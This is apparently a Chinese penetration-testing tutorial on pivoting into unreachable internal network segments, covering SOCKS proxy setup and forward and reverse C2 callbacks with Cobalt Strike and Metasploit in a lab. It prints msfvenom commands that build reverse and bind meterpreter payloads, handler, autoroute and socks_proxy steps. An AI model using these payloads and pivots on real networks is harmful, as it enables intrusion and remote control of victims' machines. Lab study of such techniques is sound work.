内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线

2、代理隧道篇-代理通讯网络不可达-SockS代理配置

实现步骤

bash 复制代码
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

bash 复制代码
解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等


1、CS

192.168.139.x 网段反向上线




socks代理链接工具-Proxifier(windows)

bash 复制代码
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为




这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线

bash 复制代码
反向监听器:reverse
正向监听器:bind(需主动连接)







192.168.3.x 网段正向上线






继续正向上线这个3.22服务器

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

查看路由表

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p

background 返回不结束会话

创建socks节点

bash 复制代码
use auxiliary/server/socks_proxy


socks代理链接工具-proxychains(linux)

加入修改配置:

bash 复制代码
/etc/proxychains4.conf


调用加载测试:

bash 复制代码
 proxychains4 curl http://192.168.2.22

192.168.2.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run



查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
/etc/proxychains4.conf


192.168.3.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run


查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
 /etc/proxychains4.conf


192.168.4.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
相关推荐
test12809 天前
局域网 docker pull 使用代理拉取镜像
docker·容器·代理·docker pull·http_proxy
xiangshangdemayi13 天前
vue3环境下mapbox本地部署极速入门
部署·矢量切片·mapbox·内网·离线·天地图
OceanSky617 天前
配置websocket消息代理类AbstractBrokerRegistration
websocket·broker·代理
ccc_9wy19 天前
pikachu靶场SSRF-file_get_content测试报告
网络安全·内网·ssrf·web漏洞·中间人攻击·filegetcontents·file协议
浪游东戴河1 个月前
WebRTC源码下载及编译(Ubuntu20.04)
ubuntu·webrtc·编译·代理·下载
Hello 0 12 个月前
代理导致的git错误
git·代理·v2rayn
大数据AI人工智能培训专家培训讲师叶梓2 个月前
大模型从失败中学习 —— 微调大模型以提升Agent性能
人工智能·学习·性能优化·微调·agent·代理·大模型微调
Splashtop高性能远程控制软件2 个月前
远程桌面内网穿透是什么?有什么作用?
内网穿透·远程控制·远程桌面·内网
路宇2 个月前
Android studio设置国内镜像代理(HTTP Proxy)教程详解
android·http·android studio·proxy·代理
人工智能培训咨询叶梓3 个月前
UFO:革新Windows操作系统交互的UI聚焦代理
人工智能·windows·ui·计算机视觉·大模型·交互·代理